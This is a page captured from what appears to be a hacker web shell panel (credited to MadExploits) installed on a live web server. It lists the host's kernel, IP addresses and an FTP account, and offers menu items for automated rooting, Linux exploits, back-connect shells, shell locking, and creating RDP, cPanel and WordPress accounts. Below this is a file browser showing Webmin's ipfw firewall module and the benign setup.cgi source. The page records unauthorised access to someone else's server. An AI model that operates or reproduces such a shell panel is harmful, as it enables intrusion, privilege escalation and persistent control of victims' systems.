Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.158
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
ipfw /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
1.04
KB
-rw-r--r--
apply.cgi
293
B
-rwxr-xr-x
bootup.cgi
240
B
-rwxr-xr-x
cluster.cgi
1.98
KB
-rwxr-xr-x
cluster_add.cgi
1.79
KB
-rwxr-xr-x
cluster_delete.cgi
470
B
-rwxr-xr-x
config
89
B
-rw-r--r--
config.info
472
B
-rw-r--r--
config.info.ca
433
B
-rw-r--r--
config.info.de
539
B
-rw-r--r--
config.info.nl
426
B
-rw-r--r--
convert.cgi
274
B
-rwxr-xr-x
edit_rule.cgi
10.16
KB
-rwxr-xr-x
index.cgi
6.36
KB
-rwxr-xr-x
install_check.pl
484
B
-rwxr-xr-x
ipfw-lib.pl
17.42
KB
-rwxr-xr-x
log_parser.pl
569
B
-rwxr-xr-x
module.info
170
B
-rw-r--r--
module.info.af
0
B
-rw-r--r--
module.info.af.auto
114
B
-rw-r--r--
module.info.ar
0
B
-rw-r--r--
module.info.ar.auto
169
B
-rw-r--r--
module.info.be
0
B
-rw-r--r--
module.info.be.auto
192
B
-rw-r--r--
module.info.bg
0
B
-rw-r--r--
module.info.bg.auto
208
B
-rw-r--r--
module.info.ca
106
B
-rw-r--r--
module.info.cs
0
B
-rw-r--r--
module.info.cs.auto
108
B
-rw-r--r--
module.info.da
0
B
-rw-r--r--
module.info.da.auto
105
B
-rw-r--r--
module.info.de
117
B
-rw-r--r--
module.info.el
0
B
-rw-r--r--
module.info.el.auto
222
B
-rw-r--r--
module.info.es
0
B
-rw-r--r--
module.info.es.auto
99
B
-rw-r--r--
module.info.eu
0
B
-rw-r--r--
module.info.eu.auto
105
B
-rw-r--r--
module.info.fa
0
B
-rw-r--r--
module.info.fa.auto
171
B
-rw-r--r--
module.info.fi
0
B
-rw-r--r--
module.info.fi.auto
113
B
-rw-r--r--
module.info.fr
0
B
-rw-r--r--
module.info.fr.auto
117
B
-rw-r--r--
module.info.he
0
B
-rw-r--r--
module.info.he.auto
157
B
-rw-r--r--
module.info.hr
0
B
-rw-r--r--
module.info.hr.auto
112
B
-rw-r--r--
module.info.hu
0
B
-rw-r--r--
module.info.hu.auto
139
B
-rw-r--r--
module.info.it
0
B
-rw-r--r--
module.info.it.auto
112
B
-rw-r--r--
module.info.ja
0
B
-rw-r--r--
module.info.ja.auto
158
B
-rw-r--r--
module.info.ko
0
B
-rw-r--r--
module.info.ko.auto
125
B
-rw-r--r--
module.info.lt
0
B
-rw-r--r--
module.info.lt.auto
120
B
-rw-r--r--
module.info.lv
0
B
-rw-r--r--
module.info.lv.auto
121
B
-rw-r--r--
module.info.ms
0
B
-rw-r--r--
module.info.ms.auto
114
B
-rw-r--r--
module.info.mt
0
B
-rw-r--r--
module.info.mt.auto
110
B
-rw-r--r--
module.info.nl
21
B
-rw-r--r--
module.info.nl.auto
98
B
-rw-r--r--
module.info.no
0
B
-rw-r--r--
module.info.no.auto
115
B
-rw-r--r--
module.info.pl
0
B
-rw-r--r--
module.info.pl.auto
102
B
-rw-r--r--
module.info.pt
0
B
-rw-r--r--
module.info.pt.auto
99
B
-rw-r--r--
module.info.pt_BR
0
B
-rw-r--r--
module.info.pt_BR.auto
105
B
-rw-r--r--
module.info.ro
0
B
-rw-r--r--
module.info.ro.auto
114
B
-rw-r--r--
module.info.ru
0
B
-rw-r--r--
module.info.ru.auto
171
B
-rw-r--r--
module.info.sk
0
B
-rw-r--r--
module.info.sk.auto
106
B
-rw-r--r--
module.info.sl
0
B
-rw-r--r--
module.info.sl.auto
120
B
-rw-r--r--
module.info.sv
0
B
-rw-r--r--
module.info.sv.auto
111
B
-rw-r--r--
module.info.th
0
B
-rw-r--r--
module.info.th.auto
177
B
-rw-r--r--
module.info.tr
0
B
-rw-r--r--
module.info.tr.auto
140
B
-rw-r--r--
module.info.uk
0
B
-rw-r--r--
module.info.uk.auto
194
B
-rw-r--r--
module.info.ur
0
B
-rw-r--r--
module.info.ur.auto
235
B
-rw-r--r--
module.info.vi
0
B
-rw-r--r--
module.info.vi.auto
139
B
-rw-r--r--
module.info.zh
0
B
-rw-r--r--
module.info.zh.auto
95
B
-rw-r--r--
module.info.zh_TW
0
B
-rw-r--r--
module.info.zh_TW.auto
101
B
-rw-r--r--
move.cgi
561
B
-rwxr-xr-x
save_rule.cgi
8.19
KB
-rwxr-xr-x
setup.cgi
4.14
KB
-rwxr-xr-x
start.pl
271
B
-rwxr-xr-x
stop.pl
254
B
-rwxr-xr-x
unapply.cgi
257
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setup.cgi
#!/usr/bin/perl # setup.cgi # Create an initial IPFW rules file require './ipfw-lib.pl'; &ReadParse(); # Start with base configuration, which will include 65535 rule $rules = &get_config("$config{'ipfw'} list |", \$out); if ($in{'reset'}) { @$rules = grep { $_->{'num'} == 65535 } @$rules; } # A flush will generate the 65535 rule, so we can exclude it if (&get_ipfw_format() == 1) { @$rules = grep { $_->{'num'} != 65535 } @$rules; } # Add selected rules if ($in{'auto'} == 0) { # Allow all traffic splice(@$rules, 0, 0, { "action" => "allow", "num" => "00100", "proto" => "all", "from" => "any", "to" => "any", "cmt" => "Allow all traffic" }); } elsif ($in{'auto'} >= 2) { # Block all traffic, apart from established connections, DNS replies # and safe ICMP types $iface = $in{'iface'.$in{'auto'}} || $in{'iface'.$in{'auto'}.'_other'}; $iface || &error($text{'setup_eiface'}); splice(@$rules, 0, 0, { "action" => "skipto", "aarg" => "00300", "num" => "00100", "proto" => "all", "from" => "any", "to" => "any", "recv" => $iface, "cmt" => "Skip next rule for external interface" }, { "action" => "allow", "num" => "00200", "proto" => "all", "from" => "any", "to" => "any", "cmt" => "Allow all traffic on internal interfaces" }, { "action" => "allow", "num" => "00300", "proto" => "tcp", "from" => "any", "to" => "any", "established" => 1, "cmt" => "Allow established TCP connections" }, { "action" => "allow", "num" => "00400", "proto" => "tcp", "from" => "any", "to" => "any", "tcpflags" => "ack", "cmt" => "Allow traffic with ACK flag set" }, { "action" => "allow", "num" => "00500", "proto" => "udp", "from" => "any", "from_ports" => "53", "to" => "any", "to_ports" => "1024-65535", "cmt" => "Accept responses to DNS queries" }, { "action" => "allow", "num" => "00600", "proto" => "icmp", "from" => "any", "to" => "any", "icmptypes" => "0,3,4,11,12", "cmt" => "Accept safe ICMP types" }); if ($in{'auto'} >= 3) { # Add SSH and ident splice(@$rules, @$rules-1, 0, { "action" => "allow", "num" => "00700", "proto" => "tcp", "from" => "any", "to" => "any", "to_ports" => 22, "cmt" => "Allow connections to our SSH server" }, { "action" => "allow", "num" => "00800", "proto" => "tcp", "from" => "any", "to" => "any", "to_ports" => 113, "cmt" => "Allow connections to our IDENT server" }); } if ($in{'auto'} >= 4) { # Allow pings and most high ports splice(@$rules, @$rules-1, 0, { "action" => "allow", "num" => "00900", "proto" => "icmp", "from" => "any", "to" => "any", "icmptypes" => "8", "cmt" => "Respond to pings" }, { "action" => "deny", "num" => "01000", "proto" => "tcp", "from" => "any", "to" => "any", "to_ports" => "2049-2050", "cmt" => "Protect our NFS server" }, { "action" => "deny", "num" => "01100", "proto" => "tcp", "from" => "any", "to" => "any", "to_ports" => "6000-6063", "cmt" => "Protect our X11 display server" }, { "action" => "deny", "num" => "01200", "proto" => "tcp", "from" => "any", "to" => "any", "to_ports" => "7000-7010", "cmt" => "Protect our X font server" }, { "action" => "allow", "num" => "01300", "proto" => "tcp", "from" => "any", "to" => "any", "to_ports" => "1024-65535", "cmt" => "Allow connections to unprivileged ports" }); } # Add final deny all rule (if needed) local $lr = $rules->[@$rules-1]; if ($lr->{'num'} != 65535 || $lr->{'action'} ne 'deny') { splice(@$rules, @$rules-1, 0, { "action" => "deny", "num" => "10000", "proto" => "all", "from" => "any", "to" => "any" }); } } # Add flush line at top if (&get_ipfw_format() == 1) { splice(@$rules, 0, 0, { 'other' => 1, 'text' => 'flush' }); } # Save firewall &lock_file($ipfw_file); &save_config($rules); &unlock_file($ipfw_file); ©_to_cluster(); if ($in{'atboot'}) { &enable_boot(); } &webmin_log("setup"); &redirect("");
Close